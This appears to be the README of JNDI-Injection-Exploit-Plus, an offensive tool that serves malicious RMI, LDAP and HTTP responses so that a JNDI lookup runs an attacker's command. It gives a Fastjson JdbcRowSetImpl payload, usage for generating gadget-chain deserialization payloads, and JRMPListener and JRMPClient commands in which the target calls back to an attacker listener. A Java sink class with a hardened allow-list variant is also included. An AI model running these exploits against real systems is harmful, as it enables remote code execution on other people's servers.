JNDI-Injection-Exploit-Plus: generating workable JNDI links and providing background services

JNDI-Injection-Exploit-Plus

JNDI-Injection-Exploit-Plus is a tool for generating workable JNDI links and providing the background services behind them by starting RMI, LDAP and HTTP servers. The RMI and LDAP servers answer a lookup of the generated link with a Reference whose codebase points at the HTTP server, and the HTTP server serves the remote class file that runs your command.

Using this tool you get JNDI links that you can insert into your POC to test for a vulnerability.

generating JNDI links

For example, this is a Fastjson vul-poc (JdbcRowSetImpl.setAutoCommit triggers connect(), which does an InitialContext lookup of dataSourceName):

{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://127.0.0.1:1099/Object","autoCommit":true}

We can replace "rmi://127.0.0.1:1099/Object" with the link generated by JNDI-Injection-Exploit-Plus to test the vulnerability.

What's more, you can also use JNDI-Injection-Exploit-Plus to generate base64/hex encoded deserialization payloads, like ysoserial does.
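To see what a generated link does on the target side, the minimal sink below is an added example (not code from JNDI-Injection-Exploit-Plus or from Fastjson): it performs the same InitialContext lookup that JdbcRowSetImpl reaches through setDataSourceName/setAutoCommit, and puts a hardened lookup with an allow-list next to it. The class name, the allow-listed JNDI name and the fallback link are hypothetical. Keep in mind that the remote-classfile step only works where the JDK still trusts URL codebases (com.sun.jndi.rmi.object.trustURLCodebase defaults to false since 8u121, com.sun.jndi.ldap.object.trustURLCodebase since 8u191); on newer JDKs the lookup still reaches your server, but the class is not loaded, which is where the tool's deserialization payloads come in.

```java
import java.util.Collections;
import java.util.Set;
import javax.naming.Context;
import javax.naming.InitialContext;
import javax.naming.NamingException;

// Hypothetical sink for exercising a generated JNDI link (example code, not part of the tool).
public class JndiSink {

    // Vulnerable: the lookup name comes straight from untrusted input.
    // With a link from JNDI-Injection-Exploit-Plus, the JDK connects to the tool's
    // RMI/LDAP server, receives a Reference with a remote codebase and, if the JDK
    // trusts URL codebases, fetches and instantiates the class that runs the -C command.
    public static Object lookupUnsafe(String userControlledName) throws NamingException {
        Context ctx = new InitialContext();
        return ctx.lookup(userControlledName);
    }

    // Hardened: only fixed, local JNDI names are allowed; a URL never reaches lookup().
    // "java:comp/env/jdbc/appDb" is a hypothetical application name.
    private static final Set<String> ALLOWED = Collections.singleton("java:comp/env/jdbc/appDb");

    public static Object lookupSafe(String name) throws NamingException {
        if (!ALLOWED.contains(name)) {
            throw new IllegalArgumentException("JNDI name not in allow-list: " + name);
        }
        Context ctx = new InitialContext();
        return ctx.lookup(name);
    }

    public static void main(String[] args) {
        // Pass the link printed by JNDI-Injection-Exploit-Plus as the first argument,
        // e.g. rmi://<your-address>:1099/<name>; the fallback below is a placeholder.
        String link = args.length > 0 ? args[0] : "rmi://127.0.0.1:1099/Object";

        // null means the JDK's built-in default applies (false on 8u121+/8u191+, see above).
        System.out.println("com.sun.jndi.rmi.object.trustURLCodebase  = "
                + System.getProperty("com.sun.jndi.rmi.object.trustURLCodebase"));
        System.out.println("com.sun.jndi.ldap.object.trustURLCodebase = "
                + System.getProperty("com.sun.jndi.ldap.object.trustURLCodebase"));

        try {
            Object o = lookupUnsafe(link);
            System.out.println("lookup returned: " + o);
        } catch (NamingException e) {
            // Typical on a patched JDK: the server is contacted, but the remote class is refused.
            System.out.println("lookup failed (server down or codebase blocked): " + e);
        }

        try {
            lookupSafe(link);
        } catch (IllegalArgumentException | NamingException e) {
            System.out.println("hardened lookup rejected the link: " + e.getMessage());
        }
    }
}
```

Run it on an old JDK (below 8u121 for rmi://, below 8u191 for ldap://) while the tool's servers are up and the -C command executes; run it with `-Dcom.sun.jndi.rmi.object.trustURLCodebase=true` on a newer JDK to reproduce the legacy behaviour deliberately. The hardened variant rejects the link before any network traffic happens.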

Usage


JNDI Injection

JNDI Links

Run as

$ java -jar JNDI-Injection-Exploit-Plus-2.1-SNAPSHOT-all.jar [-C] [command] [-A] [address]

where:

  • -C – the command executed by the remote class file.

    (optional, default command is "open /Applications/Calculator.app")

  • -A – the address of your server, either an IP address or a domain name.

    (optional, default is the address of the first network interface)

Points for attention:

  • make sure your server's ports 1099 (RMI), 1389 (LDAP) and 8180 (HTTP) are available,

    or change the default ports in the run.ServerStart class.

  • your command is passed to Runtime.getRuntime().exec() as its argument,

    so you need to make sure the command works when run through exec().

    A shell command such as bash -c ... must be wrapped in double quotes on the command line.

Deserialization Payloads

Run as

$ java -jar JNDI-Injection-Exploit-Plus-2.1-SNAPSHOT-all.jar [-C] [command] [-D] [Gadget] [-O] [base64/hex]

where:

  • -C – the command executed when the payload is deserialized.

    (optional, default command is "open /Applications/Calculator.app")

  • -D – the deserialization gadget name (for example CommonsCollections1 or JRMPClient).

  • -O – (optional) the output encoding of the serialized payload, base64 or hex; default is base64.

Deserialization Exploits

JRMP

  • JRMPListener – listens on <port> and answers the first JRMP connection with the chosen gadget chain (here CommonsCollections1) carrying the command (here calc):

java -cp JNDI-Injection-Exploit-Plus-2.1-SNAPSHOT-all.jar exploit.JRMPListener <port> CommonsCollections1 calc

  • JRMPClient – generates the payload for the target; for this gadget the -C slot takes the listener's <ip>:<port> instead of a command, because the deserialized object simply dials back to the listener:

java -jar JNDI-Injection-Exploit-Plus-2.1-SNAPSHOT-all.jar -C <ip>:<port> -D JRMPClient -O base64

Install

Copyright (c) 2022 cckuailong